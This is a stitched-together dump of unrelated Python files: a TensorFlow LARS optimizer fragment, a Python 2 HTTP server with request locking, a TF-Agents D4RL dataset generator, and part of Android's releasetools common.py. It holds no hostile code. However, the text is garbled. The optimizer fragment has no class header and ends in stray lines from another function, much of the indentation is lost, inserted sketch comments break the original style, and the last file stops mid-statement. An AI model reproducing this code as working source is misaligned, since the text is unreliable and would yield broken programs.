"""Layer-wise Adaptive Rate Scaling for large batch training.
Introduced by "Large Batch Training of Convolutional Networks" by Y. You,
I. Gitman, and B. Ginsburg. (https://arxiv.org/abs/1708.03888)
Implements the LARS learning rate scheme presented in the paper above.
This optimizer is useful when scaling the batch size to up to 32K without
significant performance degradation. It is recommended to use the
optimizer in conjunction with:
- Gradual learning rate warm-up
- Linear learning rate scaling
- Poly rule learning rate decay
Note, LARS scaling is currently only enabled for dense tensors. Sparse
tensors use the default momentum optimizer.
"""
def __init__(
self,
learning_rate,
momentum=0.9,
weight_decay=0.0001,
# The LARS coefficient is a hyperparameter
eeta=0.001,
epsilon=0.0,
name='LARSOptimizer',
# Enable skipping variables from LARS scaling.
# TODO(sameerkm): Enable a direct mechanism to pass a
# subset of variables to the optimizer.
skip_list=None,
use_nesterov=False):
"""Construct a new LARS Optimizer.
Args:
learning_rate: A `Tensor` or floating point value.
momentum: A floating point value. Momentum hyperparameter.
weight_decay: A floating point value. Weight decay hyperparameter.
          eeta: LARS coefficient as used in the paper. Default set to LARS
coefficient from the paper. (eeta / weight_decay) determines the
highest scaling factor in LARS.
epsilon: Optional epsilon parameter to be set in models that have very
small gradients. Default set to 0.0.
name: Optional name prefix for variables and ops created.
skip_list: List of strings to enable skipping variables from scaling.
If any of the strings in skip_list is a subset of var.name, variable
'var' is skipped from LARS scaling. For a typical classification
model with batch normalization, the skip_list is
['batch_normalization', 'bias']
use_nesterov: when set to True, nesterov momentum will be enabled
Raises:
ValueError: If a hyperparameter is set to a non-sensical value.
"""
if momentum < 0.0:
raise ValueError(f'momentum should be positive: {momentum}')
if weight_decay < 0.0:
raise ValueError(f'weight_decay should be positive: {weight_decay}')
super(LARSOptimizer, self).__init__(use_locking=False, name=name)
self._learning_rate = learning_rate
self._momentum = momentum
self._weight_decay = weight_decay
self._eeta = eeta
self._epsilon = epsilon
self._name = name
self._skip_list = skip_list
self._use_nesterov = use_nesterov
def _create_slots(self, var_list):
for v in var_list:
self._zeros_slot(v, 'momentum', self._name)
def compute_lr(self, grad, var):
scaled_lr = self._learning_rate
if self._skip_list is None or not any(v in var.name
for v in self._skip_list):
w_norm = tf.norm(var, ord=2)
g_norm = tf.norm(grad, ord=2)
trust_ratio = tf.where(
tf.math.greater(w_norm, 0),
tf.where(
tf.math.greater(g_norm, 0),
(self._eeta * w_norm / (
g_norm + self._weight_decay * w_norm + self._epsilon)),
1.0),
1.0)
scaled_lr = self._learning_rate * trust_ratio
# Add the weight regularization gradient
grad = grad + self._weight_decay * var
return scaled_lr, grad
def _apply_dense(self, grad, var):
scaled_lr, grad = self.compute_lr(grad, var)
mom = self.get_slot(var, 'momentum')
return tf.raw_ops.ApplyMomentum(
var,
mom,
tf.cast(1.0, var.dtype.base_dtype),
grad * scaled_lr,
self._momentum,
use_locking=False,
use_nesterov=self._use_nesterov)
def _resource_apply_dense(self, grad, var):
scaled_lr, grad = self.compute_lr(grad, var)
mom = self.get_slot(var, 'momentum')
return tf.raw_ops.ResourceApplyMomentum(
var=var.handle,
accum=mom.handle,
lr=tf.cast(1.0, var.dtype.base_dtype),
grad=grad * scaled_lr,
momentum=self._momentum,
use_locking=False,
use_nesterov=self._use_nesterov)
# Fallback to momentum optimizer for sparse tensors
def _apply_sparse(self, grad, var):
mom = self.get_slot(var, 'momentum')
return tf.raw_ops.SparseApplyMomentum(
var,
mom,
tf.cast(self._learning_rate_tensor, var.dtype.base_dtype),
grad.values,
grad.indices,
tf.cast(self._momentum_tensor, var.dtype.base_dtype),
use_locking=self._use_locking,
use_nesterov=self._use_nesterov).op
def _resource_apply_sparse(self, grad, var, indices):
mom = self.get_slot(var, 'momentum')
return tf.raw_ops.ResourceSparseApplyMomentum(
var.handle,
mom.handle,
tf.cast(self._learning_rate_tensor, grad.dtype),
grad,
indices,
tf.cast(self._momentum_tensor, grad.dtype),
use_locking=self._use_locking,
use_nesterov=self._use_nesterov)
def _prepare(self):
learning_rate = self._learning_rate
if callable(learning_rate):
learning_rate = learning_rate()
self._learning_rate_tensor = tf.convert_to_tensor(
learning_rate, name='learning_rate')
momentum = self._momentum
if callable(momentum):
momentum = momentum()
self._momentum_tensor = tf.convert_to_tensor(momentum, name='momentum')
optimizer = LARSOptimizer(
learning_rate=learning_rate,
weight_decay=params.weight_decay,
skip_list=['batch_norm', 'batchnorm', 'gamma', 'beta', 'bias'],
use_nesterov=True)
else:
raise ValueError(f'Unknown optim_type `{params.optim_type}`')
return learning_rate, optimizer
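# Hedged NumPy sketch of the LARS trust ratio computed in compute_lr above:
#   trust_ratio = eeta * ||w|| / (||g|| + weight_decay * ||w|| + epsilon)
# falling back to 1.0 when either norm is zero. Reuses the 'np' import at the
# top of this file; the function name is hypothetical and for illustration.
def _lars_trust_ratio(w, g, eeta=0.001, weight_decay=0.0001, epsilon=0.0):
  w_norm, g_norm = np.linalg.norm(w), np.linalg.norm(g)
  if w_norm > 0 and g_norm > 0:
    return eeta * w_norm / (g_norm + weight_decay * w_norm + epsilon)
  return 1.0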
def get_l2_loss(excluded_keywords=None):
"""Traverse `tf.trainable_variables` compute L2 reg. Ignore `batch_norm`."""
def _is_excluded(v):
"""Guess whether a variable belongs to `batch_norm`."""
keywords = ['batchnorm', 'batch_norm', 'bn',
'layernorm', 'layer_norm']
if excluded_keywords is not None:
keywords += excluded_keywords
return any([k in v.name.lower() for k in keywords])
l2_losses = [tf.nn.l2_loss(v) for v in tf.trainable_variables()
if not _is_excluded(v)]
return tf.add_n(l2_losses)
|
HTTPServer.py
|
from BaseHTTPServer import HTTPServer as GrandparentServer, BaseHTTPRequestHandler as GrandparentHandler
import socket
from time import sleep
from Settings import PORT
from utils import *
from rorn.HTTPServer import HTTPServer as ParentServer
from rorn.Lock import getLock, getCounter
class ServerError(Exception): pass
class HTTPServer(ParentServer):
def __init__(self, *args, **kw):
super(HTTPServer, self).__init__(*args, **kw)
self.totalRequests = 0
self.currentRequests = getCounter('requests', unique = True)
def process_request(self, request, client_address):
# The #reqcheck lock is used by some threads to block requests
# Grab it to make sure none of those threads have it, and then add this request
# to 'currentRequests' to prevent those threads from starting
with getLock('#reqcheck'):
self.totalRequests += 1
self.currentRequests.inc()
return super(HTTPServer, self).process_request(request, client_address)
# When this returns, there will be no more than 'expected' processing requests and
# it will have acquired #reqcheck to keep it that way (it also returns the lock instance)
# The caller *needs* to release #reqcheck when finished
def block_requests(self, expected = 0):
from Log import console
lock = getLock('#reqcheck')
lock.acquire()
self.currentRequests -= expected
while True:
if self.currentRequests.count == 0:
self.currentRequests += expected
return lock
lock.release()
sleep(.1)
lock.acquire()
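	# Hedged usage sketch (illustrative only, based on the comment above):
	#   lock = server.block_requests(expected=1)  # count this caller's own request
	#   try:
	#       ... work that must not race with other requests ...
	#   finally:
	#       lock.release()  # the caller must release #reqcheck when finished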
def close_request(self, request):
self.currentRequests.dec()
super(HTTPServer, self).close_request(request)
def stop(self):
self.socket.close()
def getTotalRequests(self):
return self.totalRequests
def anyCurrentRequests(self):
return self.currentRequests.any()
class LoadingServer(GrandparentServer, object):
class Handler(GrandparentHandler):
def do_GET(self):
self.send_response(200)
self.end_headers()
if self.path == '/api/uptime':
self.wfile.write("-1\n")
else:
self.wfile.write(open('static/loading.html').read())
def do_POST(self):
self.send_response(302)
self.send_header('Location', '/')
self.end_headers()
def log_message(self, fmt, *args):
pass
def __init__(self):
super(LoadingServer, self).__init__(('', PORT), LoadingServer.Handler)
self.thread = None
def serve_bg(self):
self.thread = Thread(target = self.serve_wrap)
self.thread.daemon = True
self.thread.start()
def serve_wrap(self):
try:
self.serve_forever()
except socket.error:
pass
def stop(self):
self.socket.close()
if self.thread:
self.thread.join()
singleton = None
def server():
global singleton
if not singleton:
try:
from HTTPHandler import HTTPHandler
singleton = HTTPServer(('', PORT), HTTPHandler)
except socket.error, (errno, msg):
raise ServerError("Unable to open port %d: %s" % (PORT, msg))
return singleton
|
dataset_generator.py
|
# coding=utf-8
# Copyright 2020 The TF-Agents Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Generate D4RL TFRecord dataset that is compatible with TF-Agents."""
# Lint as: python3
import functools
import os
from absl import app
from absl import flags
from absl import logging
import d4rl # pylint: disable=unused-import
import gym
from tf_agents.experimental.examples.cql_sac.kumar20.dataset import dataset_utils
from tf_agents.experimental.examples.cql_sac.kumar20.dataset import file_utils
from tf_agents.system import system_multiprocessing as multiprocessing
# Using XM. # pylint: disable=unused-import
flags.DEFINE_string('root_dir', '/tmp/dataset/', 'Output dataset directory.')
flags.DEFINE_string(
'env_name', 'hopper-medium-v0', 'Env name. '
    'Should match one of the keys in d4rl.infos.DATASET_URLS')
flags.DEFINE_integer('replicas', None,
'Number of parallel replicas generating evaluations.')
flags.DEFINE_integer(
'replica_id', None,
'Replica id. If not None, only generate for this replica slice.')
flags.DEFINE_bool(
'use_trajectories', False,
'Whether to save samples as trajectories. If False, save as transitions.')
flags.DEFINE_bool(
'exclude_timeouts', False, 'Whether to exclude the final episode step '
    'if it is from a timeout instead of a terminal.')
FLAGS = flags.FLAGS
def main(_):
logging.set_verbosity(logging.INFO)
d4rl_env = gym.make(FLAGS.env_name)
d4rl_dataset = d4rl_env.get_dataset()
root_dir = os.path.join(FLAGS.root_dir, FLAGS.env_name)
dataset_dict = dataset_utils.create_episode_dataset(d4rl_dataset,
FLAGS.exclude_timeouts)
num_episodes = len(dataset_dict['episode_start_index'])
logging.info('Found %d episodes, %s total steps.', num_episodes,
len(dataset_dict['states']))
collect_data_spec = dataset_utils.create_collect_data_spec(
dataset_dict, use_trajectories=FLAGS.use_trajectories)
logging.info('Collect data spec %s', collect_data_spec)
num_replicas = FLAGS.replicas or 1
interval_size = num_episodes // num_replicas + 1
# If FLAGS.replica_id is set, only run that section of the dataset.
# This is useful if distributing the replicas on Borg.
if FLAGS.replica_id is not None:
file_name = '%s_%d.tfrecord' % (FLAGS.env_name, FLAGS.replica_id)
start_index = FLAGS.replica_id * interval_size
end_index = min((FLAGS.replica_id + 1) * interval_size, num_episodes)
file_utils.write_samples_to_tfrecord(
dataset_dict=dataset_dict,
collect_data_spec=collect_data_spec,
dataset_path=os.path.join(root_dir, file_name),
start_episode=start_index,
end_episode=end_index,
use_trajectories=FLAGS.use_trajectories)
else:
# Otherwise, parallelize with tf_agents.system.multiprocessing.
jobs = []
context = multiprocessing.get_context()
for i in range(num_replicas):
if num_replicas == 1:
file_name = '%s.tfrecord' % FLAGS.env_name
else:
file_name = '%s_%d.tfrecord' % (FLAGS.env_name, i)
dataset_path = os.path.join(root_dir, file_name)
start_index = i * interval_size
end_index = min((i + 1) * interval_size, num_episodes)
kwargs = dict(
dataset_dict=dataset_dict,
collect_data_spec=collect_data_spec,
dataset_path=dataset_path,
start_episode=start_index,
end_episode=end_index,
use_trajectories=FLAGS.use_trajectories)
job = context.Process(
target=file_utils.write_samples_to_tfrecord, kwargs=kwargs)
job.start()
jobs.append(job)
for job in jobs:
job.join()
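# Hedged sketch of the replica slicing used in main() above: episodes are
# split into contiguous chunks of num_episodes // replicas + 1, with the last
# chunk clamped to num_episodes. The helper is hypothetical and exists only
# to illustrate the index arithmetic.
def _replica_slices(num_episodes, num_replicas):
  interval = num_episodes // num_replicas + 1
  return [(i * interval, min((i + 1) * interval, num_episodes))
          for i in range(num_replicas)]
# e.g. 10 episodes over 3 replicas -> [(0, 4), (4, 8), (8, 10)]
assert _replica_slices(10, 3) == [(0, 4), (4, 8), (8, 10)]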
if __name__ == '__main__':
multiprocessing.handle_main(functools.partial(app.run, main))
|
common.py
|
# Copyright (C) 2008 The Android Open Source Project
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
import copy
import errno
import getopt
import getpass
import imp
import os
import platform
import re
import shlex
import shutil
import subprocess
import sys
import tempfile
import threading
import time
import zipfile
import blockimgdiff
from hashlib import sha1 as sha1
class Options(object):
def __init__(self):
platform_search_path = {
"linux2": "out/host/linux-x86",
"darwin": "out/host/darwin-x86",
}
self.search_path = platform_search_path.get(sys.platform, None)
self.signapk_path = "framework/signapk.jar" # Relative to search_path
self.signapk_shared_library_path = "lib64" # Relative to search_path
self.extra_signapk_args = []
self.java_path = "java" # Use the one on the path by default.
self.java_args = ["-Xmx2048m"] # The default JVM args.
self.public_key_suffix = ".x509.pem"
self.private_key_suffix = ".pk8"
# use otatools built boot_signer by default
self.boot_signer_path = "boot_signer"
self.boot_signer_args = []
self.verity_signer_path = None
self.verity_signer_args = []
self.verbose = False
self.tempfiles = []
self.device_specific = None
self.extras = {}
self.info_dict = None
self.source_info_dict = None
self.target_info_dict = None
self.worker_threads = None
# Stash size cannot exceed cache_size * threshold.
self.cache_size = None
self.stash_threshold = 0.8
OPTIONS = Options()
# Values for "certificate" in apkcerts that mean special things.
SPECIAL_CERT_STRINGS = ("PRESIGNED", "EXTERNAL")
class ErrorCode(object):
"""Define error_codes for failures that happen during the actual
update package installation.
Error codes 0-999 are reserved for failures before the package
installation (i.e. low battery, package verification failure).
Detailed code in 'bootable/recovery/error_code.h' """
SYSTEM_VERIFICATION_FAILURE = 1000
SYSTEM_UPDATE_FAILURE = 1001
SYSTEM_UNEXPECTED_CONTENTS = 1002
SYSTEM_NONZERO_CONTENTS = 1003
SYSTEM_RECOVER_FAILURE = 1004
VENDOR_VERIFICATION_FAILURE = 2000
VENDOR_UPDATE_FAILURE = 2001
VENDOR_UNEXPECTED_CONTENTS = 2002
VENDOR_NONZERO_CONTENTS = 2003
VENDOR_RECOVER_FAILURE = 2004
OEM_PROP_MISMATCH = 3000
FINGERPRINT_MISMATCH = 3001
THUMBPRINT_MISMATCH = 3002
OLDER_BUILD = 3003
DEVICE_MISMATCH = 3004
BAD_PATCH_FILE = 3005
INSUFFICIENT_CACHE_SPACE = 3006
TUNE_PARTITION_FAILURE = 3007
APPLY_PATCH_FAILURE = 3008
class ExternalError(RuntimeError):
pass
def Run(args, **kwargs):
"""Create and return a subprocess.Popen object, printing the command
line on the terminal if -v was specified."""
if OPTIONS.verbose:
print(" running: ", " ".join(args))
return subprocess.Popen(args, **kwargs)
def CloseInheritedPipes():
""" Gmake in MAC OS has file descriptor (PIPE) leak. We close those fds
before doing other work."""
if platform.system() != "Darwin":
return
for d in range(3, 1025):
try:
stat = os.fstat(d)
if stat is not None:
pipebit = stat[0] & 0x1000
if pipebit != 0:
os.close(d)
except OSError:
pass
def LoadInfoDict(input_file, input_dir=None):
"""Read and parse the META/misc_info.txt key/value pairs from the
input target files and return a dict."""
def read_helper(fn):
if isinstance(input_file, zipfile.ZipFile):
return input_file.read(fn)
else:
path = os.path.join(input_file, *fn.split("/"))
try:
with open(path) as f:
return f.read()
except IOError as e:
if e.errno == errno.ENOENT:
raise KeyError(fn)
d = {}
try:
d = LoadDictionaryFromLines(read_helper("META/misc_info.txt").split("\n"))
except KeyError:
# ok if misc_info.txt doesn't exist
pass
# backwards compatibility: These values used to be in their own
# files. Look for them, in case we're processing an old
# target_files zip.
if "mkyaffs2_extra_flags" not in d:
try:
d["mkyaffs2_extra_flags"] = read_helper(
"META/mkyaffs2-extra-flags.txt").strip()
except KeyError:
# ok if flags don't exist
pass
if "recovery_api_version" not in d:
try:
d["recovery_api_version"] = read_helper(
"META/recovery-api-version.txt").strip()
except KeyError:
raise ValueError("can't find recovery API version in input target-files")
if "tool_extensions" not in d:
try:
d["tool_extensions"] = read_helper("META/tool-extensions.txt").strip()
except KeyError:
# ok if extensions don't exist
pass
if "fstab_version" not in d:
d["fstab_version"] = "1"
# A few properties are stored as links to the files in the out/ directory.
# It works fine with the build system. However, they are no longer available
# when (re)generating from target_files zip. If input_dir is not None, we
# are doing repacking. Redirect those properties to the actual files in the
# unzipped directory.
if input_dir is not None:
# We carry a copy of file_contexts.bin under META/. If not available,
# search BOOT/RAMDISK/. Note that sometimes we may need a different file
# to build images than the one running on device, such as when enabling
# system_root_image. In that case, we must have the one for image
# generation copied to META/.
fc_basename = os.path.basename(d.get("selinux_fc", "file_contexts"))
fc_config = os.path.join(input_dir, "META", fc_basename)
if d.get("system_root_image") == "true":
assert os.path.exists(fc_config)
if not os.path.exists(fc_config):
fc_config = os.path.join(input_dir, "BOOT", "RAMDISK", fc_basename)
if not os.path.exists(fc_config):
fc_config = None
if fc_config:
d["selinux_fc"] = fc_config
# Similarly we need to redirect "ramdisk_dir" and "ramdisk_fs_config".
if d.get("system_root_image") == "true":
d["ramdisk_dir"] = os.path.join(input_dir, "ROOT")
d["ramdisk_fs_config"] = os.path.join(
input_dir, "META", "root_filesystem_config.txt")
# Redirect {system,vendor}_base_fs_file.
if "system_base_fs_file" in d:
basename = os.path.basename(d["system_base_fs_file"])
system_base_fs_file = os.path.join(input_dir, "META", basename)
if os.path.exists(system_base_fs_file):
d["system_base_fs_file"] = system_base_fs_file
else:
print("Warning: failed to find system base fs file: %s" % (
system_base_fs_file,))
del d["system_base_fs_file"]
if "vendor_base_fs_file" in d:
basename = os.path.basename(d["vendor_base_fs_file"])
vendor_base_fs_file = os.path.join(input_dir, "META", basename)
if os.path.exists(vendor_base_fs_file):
d["vendor_base_fs_file"] = vendor_base_fs_file
else:
print("Warning: failed to find vendor base fs file: %s" % (
vendor_base_fs_file,))
del d["vendor_base_fs_file"]
try:
data = read_helper("META/imagesizes.txt")
for line in data.split("\n"):
if not line:
continue
name, value = line.split(" ", 1)
if not value:
continue
if name == "blocksize":
d[name] = value
else:
d[name + "_size"] = value
except KeyError:
pass
def makeint(key):
if key in d:
d[key] = int(d[key], 0)
makeint("recovery_api_version")
makeint("blocksize")
makeint("system_size")
makeint("vendor_size")
makeint("userdata_size")
makeint("cache_size")
makeint("recovery_size")
makeint("boot_size")
makeint("fstab_version")
if d.get("no_recovery", False) == "true":
d["fstab"] = None
else:
d["fstab"] = LoadRecoveryFSTab(read_helper, d["fstab_version"],
d.get("system_root_image", False))
d["build.prop"] = LoadBuildProp(read_helper)
return d
def LoadBuildProp(read_helper):
try:
data = read_helper("SYSTEM/build.prop")
except KeyError:
print("Warning: could not find SYSTEM/build.prop in %s" % zip)
data = ""
return LoadDictionaryFromLines(data.split("\n"))
def LoadDictionaryFromLines(lines):
d = {}
for line in lines:
line = line.strip()
if not line or line.startswith("#"):
continue
if "=" in line:
name, value = line.split("=", 1)
d[name] = value
return d
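# Hedged example of LoadDictionaryFromLines (illustrative values only):
# comment lines and blank lines are skipped, and only the first '=' splits.
assert LoadDictionaryFromLines(
    ["# comment", "", "ro.build.id=ABC", "ro.extra=a=b"]) == {
        "ro.build.id": "ABC", "ro.extra": "a=b"}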
def LoadRecoveryFSTab(read_helper, fstab_version, system_root_image=False):
class Partition(object):
def __init__(self, mount_point, fs_type, device, length, device2, context):
self.mount_point = mount_point
self.fs_type = fs_type
self.device = device
self.length = length
self.device2 = device2
self.context = context
try:
data = read_helper("RECOVERY/RAMDISK/etc/recovery.fstab")
except KeyError:
print("Warning: could not find RECOVERY/RAMDISK/etc/recovery.fstab")
data = ""
if fstab_version == 1:
d = {}
for line in data.split("\n"):
line = line.strip()
if not line or line.startswith("#"):
continue
pieces = line.split()
if not 3 <= len(pieces) <= 4:
raise ValueError("malformed recovery.fstab line: \"%s\"" % (line,))
options = None
if len(pieces) >= 4:
if pieces[3].startswith("/"):
device2 = pieces[3]
if len(pieces) >= 5:
options = pieces[4]
else:
device2 = None
options = pieces[3]
else:
device2 = None
mount_point = pieces[0]
length = 0
if options:
options = options.split(",")
for i in options:
if i.startswith("length="):
length = int(i[7:])
else:
print("%s: unknown option \"%s\"" % (mount_point, i))
d[mount_point] = Partition(mount_point=mount_point, fs_type=pieces[1],
device=pieces[2], length=length,
device2=device2)
elif fstab_version == 2:
d = {}
for line in data.split("\n"):
line = line.strip()
if not line or line.startswith("#"):
continue
# <src> <mnt_point> <type> <mnt_flags and options> <fs_mgr_flags>
pieces = line.split()
if len(pieces) != 5:
raise ValueError("malformed recovery.fstab line: \"%s\"" % (line,))
# Ignore entries that are managed by vold
options = pieces[4]
if "voldmanaged=" in options:
continue
# It's a good line, parse it
length = 0
options = options.split(",")
for i in options:
if i.startswith("length="):
length = int(i[7:])
else:
# Ignore all unknown options in the unified fstab
continue
mount_flags = pieces[3]
# Honor the SELinux context if present.
context = None
for i in mount_flags.split(","):
if i.startswith("context="):
context = i
mount_point = pieces[1]
d[mount_point] = Partition(mount_point=mount_point, fs_type=pieces[2],
device=pieces[0], length=length,
device2=None, context=context)
else:
raise ValueError("Unknown fstab_version: \"%d\"" % (fstab_version,))
# / is used for the system mount point when the root directory is included in
# system. Other areas assume system is always at "/system" so point /system
# at /.
if system_root_image:
assert not d.has_key("/system") and d.has_key("/")
d["/system"] = d["/"]
return d
def DumpInfoDict(d):
for k, v in sorted(d.items()):
print("%-25s = (%s) %s" % (k, type(v).__name__, v))
def _BuildBootableImage(sourcedir, fs_config_file, info_dict=None,
has_ramdisk=False):
"""Build a bootable image from the specified sourcedir.
Take a kernel, cmdline, and optionally a ramdisk directory from the input (in
'sourcedir'), and turn them into a boot image. Return the image data, or
  None if sourcedir does not appear to contain files for building the
requested image."""
def make_ramdisk():
ramdisk_img = tempfile.NamedTemporaryFile()
if os.access(fs_config_file, os.F_OK):
cmd = ["mkbootfs", "-f", fs_config_file,
os.path.join(sourcedir, "RAMDISK")]
else:
cmd = ["mkbootfs", os.path.join(sourcedir, "RAMDISK")]
p1 = Run(cmd, stdout=subprocess.PIPE)
p2 = Run(["minigzip"], stdin=p1.stdout, stdout=ramdisk_img.file.fileno())
p2.wait()
p1.wait()
assert p1.returncode == 0, "mkbootfs of %s ramdisk failed" % (sourcedir,)
assert p2.returncode == 0, "minigzip of %s ramdisk failed" % (sourcedir,)
return ramdisk_img
if not os.access(os.path.join(sourcedir, "kernel"), os.F_OK):
return None
if has_ramdisk and not os.access(os.path.join(sourcedir, "RAMDISK"), os.F_OK):
return None
if info_dict is None:
info_dict = OPTIONS.info_dict
img = tempfile.NamedTemporaryFile()
if has_ramdisk:
ramdisk_img = make_ramdisk()
# use MKBOOTIMG from environ, or "mkbootimg" if empty or not set
mkbootimg = os.getenv('MKBOOTIMG') or "mkbootimg"
cmd = [mkbootimg, "--kernel", os.path.join(sourcedir, "kernel")]
fn = os.path.join(sourcedir, "second")
if os.access(fn, os.F_OK):
cmd.append("--second")
cmd.append(fn)
fn = os.path.join(sourcedir, "cmdline")
if os.access(fn, os.F_OK):
cmd.append("--cmdline")
cmd.append(open(fn).read().rstrip("\n"))
fn = os.path.join(sourcedir, "base")
if os.access(fn, os.F_OK):
cmd.append("--base")
cmd.append(open(fn).read().rstrip("\n"))
fn = os.path.join(sourcedir, "pagesize")
if os.access(fn, os.F_OK):
cmd.append("--pagesize")
cmd.append(open(fn).read().rstrip("\n"))
args = info_dict.get("mkbootimg_args", None)
if args and args.strip():
cmd.extend(shlex.split(args))
args = info_dict.get("mkbootimg_version_args", None)
if args and args.strip():
cmd.extend(shlex.split(args))
if has_ramdisk:
cmd.extend(["--ramdisk", ramdisk_img.name])
img_unsigned = None
if info_dict.get("vboot", None):
img_unsigned = tempfile.NamedTemporaryFile()
cmd.extend(["--output", img_unsigned.name])
else:
cmd.extend(["--output", img.name])
p = Run(cmd, stdout=subprocess.PIPE)
p.communicate()
assert p.returncode == 0, "mkbootimg of %s image failed" % (
os.path.basename(sourcedir),)
if (info_dict.get("boot_signer", None) == "true" and
info_dict.get("verity_key", None)):
path = "/" + os.path.basename(sourcedir).lower()
cmd = [OPTIONS.boot_signer_path]
cmd.extend(OPTIONS.boot_signer_args)
cmd.extend([path, img.name,
info_dict["verity_key"] + ".pk8",
info_dict["verity_key"] + ".x509.pem", img.name])
p = Run(cmd, stdout=subprocess.PIPE)
p.communicate()
assert p.returncode == 0, "boot_signer of %s image failed" % path
# Sign the image if vboot is non-empty.
elif info_dict.get("vboot", None):
path = "/" + os.path.basename(sourcedir).lower()
img_keyblock = tempfile.NamedTemporaryFile()
cmd = [info_dict["vboot_signer_cmd"], info_dict["futility"],
img_unsigned.name, info_dict["vboot_key"] + ".vbpubk",
info_dict["vboot_key"] + ".vbprivk",
info_dict["vboot_subkey"] + ".vbprivk",
img_keyblock.name,
img.name]
p = Run(cmd, stdout=subprocess.PIPE)
p.communicate()
assert p.returncode == 0, "vboot_signer of %s image failed" % path
# Clean up the temp files.
img_unsigned.close()
img_keyblock.close()
  img.seek(0, os.SEEK_SET)
data = img.read()
if has_ramdisk:
ramdisk_img.close()
img.close()
return data
def GetBootableImage(name, prebuilt_name, unpack_dir, tree_subdir,
info_dict=None):
"""Return a File object with the desired bootable image.
Look for it in 'unpack_dir'/BOOTABLE_IMAGES under the name 'prebuilt_name',
otherwise look for it under 'unpack_dir'/IMAGES, otherwise construct it from
the source files in 'unpack_dir'/'tree_subdir'."""
prebuilt_path = os.path.join(unpack_dir, "BOOTABLE_IMAGES", prebuilt_name)
if os.path.exists(prebuilt_path):
print("using prebuilt %s from BOOTABLE_IMAGES..." % (prebuilt_name,))
return File.FromLocalFile(name, prebuilt_path)
prebuilt_path = os.path.join(unpack_dir, "IMAGES", prebuilt_name)
if os.path.exists(prebuilt_path):
print("using prebuilt %s from IMAGES..." % (prebuilt_name,))
return File.FromLocalFile(name, prebuilt_path)
print("building image from target_files %s..." % (tree_subdir,))
if info_dict is None:
info_dict = OPTIONS.info_dict
# With system_root_image == "true", we don't pack ramdisk into the boot image.
# Unless "recovery_as_boot" is specified, in which case we carry the ramdisk
# for recovery.
has_ramdisk = (info_dict.get("system_root_image") != "true" or
prebuilt_name != "boot.img" or
info_dict.get("recovery_as_boot") == "true")
fs_config = "META/" + tree_subdir.lower() + "_filesystem_config.txt"
data = _BuildBootableImage(os.path.join(unpack_dir, tree_subdir),
os.path.join(unpack_dir, fs_config),
info_dict, has_ramdisk)
if data:
return File(name, data)
return None
def UnzipTemp(filename, pattern=None):
"""Unzip the given archive into a temporary directory and return the name.
If filename is of the form "foo.zip+bar.zip", unzip foo.zip into a
temp dir, then unzip bar.zip into that_dir/BOOTABLE_IMAGES.
Returns (tempdir, zipobj) where zipobj is a zipfile.ZipFile (of the
main file), open for reading.
"""
tmp = tempfile.mkdtemp(prefix="targetfiles-")
OPTIONS.tempfiles.append(tmp)
def unzip_to_dir(filename, dirname):
cmd = ["unzip", "-o", "-q", filename, "-d", dirname]
if pattern is not None:
cmd.extend(pattern)
p = Run(cmd, stdout=subprocess.PIPE)
p.communicate()
if p.returncode != 0:
raise ExternalError("failed to unzip input target-files \"%s\"" %
(filename,))
m = re.match(r"^(.*[.]zip)\+(.*[.]zip)$", filename, re.IGNORECASE)
if m:
unzip_to_dir(m.group(1), tmp)
unzip_to_dir(m.group(2), os.path.join(tmp, "BOOTABLE_IMAGES"))
filename = m.group(1)
else:
unzip_to_dir(filename, tmp)
return tmp, zipfile.ZipFile(filename, "r")
def GetKeyPasswords(keylist):
"""Given a list of keys, prompt the user to enter passwords for
those which require them. Return a {key: password} dict. password
will be None if the key has no password."""
no_passwords = []
need_passwords = []
key_passwords = {}
devnull = open("/dev/null", "w+b")
for k in sorted(keylist):
# We don't need a password for things that aren't really keys.
if k in SPECIAL_CERT_STRINGS:
no_passwords.append(k)
continue
p = Run(["openssl", "pkcs8", "-in", k+OPTIONS.private_key_suffix,
"-inform", "DER", "-nocrypt"],
stdin=devnull.fileno(),
stdout=devnull.fileno(),
stderr=subprocess.STDOUT)
p.communicate()
if p.returncode == 0:
# Definitely an unencrypted key.
no_passwords.append(k)
else:
p = Run(["openssl", "pkcs8", "-in", k+OPTIONS.private_key_suffix,
"-inform", "DER", "-passin", "pass:"],
stdin=devnull.fileno(),
stdout=devnull.fileno(),
stderr=subprocess.PIPE)
_, stderr = p.communicate()
if p.returncode == 0:
# Encrypted key with empty string as password.
key_passwords[k] = ''
elif stderr.startswith('Error decrypting key'):
# Definitely encrypted key.
# It would have said "Error reading key" if it didn't parse correctly.
need_passwords.append(k)
else:
# Potentially, a type of key that openssl doesn't understand.
# We'll let the routines in signapk.jar handle it.
no_passwords.append(k)
devnull.close()
key_passwords.update(PasswordManager().GetPasswords(need_passwords))
key_passwords.update(dict.fromkeys(no_passwords, None))
return key_passwords
def GetMinSdkVersion(apk_name):
"""Get the minSdkVersion delared in the APK. This can be both a decimal number
(API Level) or a codename.
"""
p = Run(["aapt", "dump", "badging", apk_name], stdout=subprocess.PIPE)
output, err = p.communicate()
if err:
raise ExternalError("Failed to obtain minSdkVersion: aapt return code %s"
% (p.returncode,))
for line in output.split("\n"):
# Looking for lines such as sdkVersion:'23' or sdkVersion:'M'
m = re.match(r'sdkVersion:\'([^\']*)\'', line)
if m:
return m.group(1)
raise ExternalError("No minSdkVersion returned by aapt")
def GetMinSdkVersionInt(apk_name, codename_to_api_level_map):
"""Get the minSdkVersion declared in the APK as a number (API Level). If
minSdkVersion is set to a codename, it is translated to a number using the
provided map.
"""
version = GetMinSdkVersion(apk_name)
try:
return int(version)
except ValueError:
# Not a decimal number. Codename?
if version in codename_to_api_level_map:
return codename_to_api_level_map[version]
else:
raise ExternalError("Unknown minSdkVersion: '%s'. Known codenames: %s"
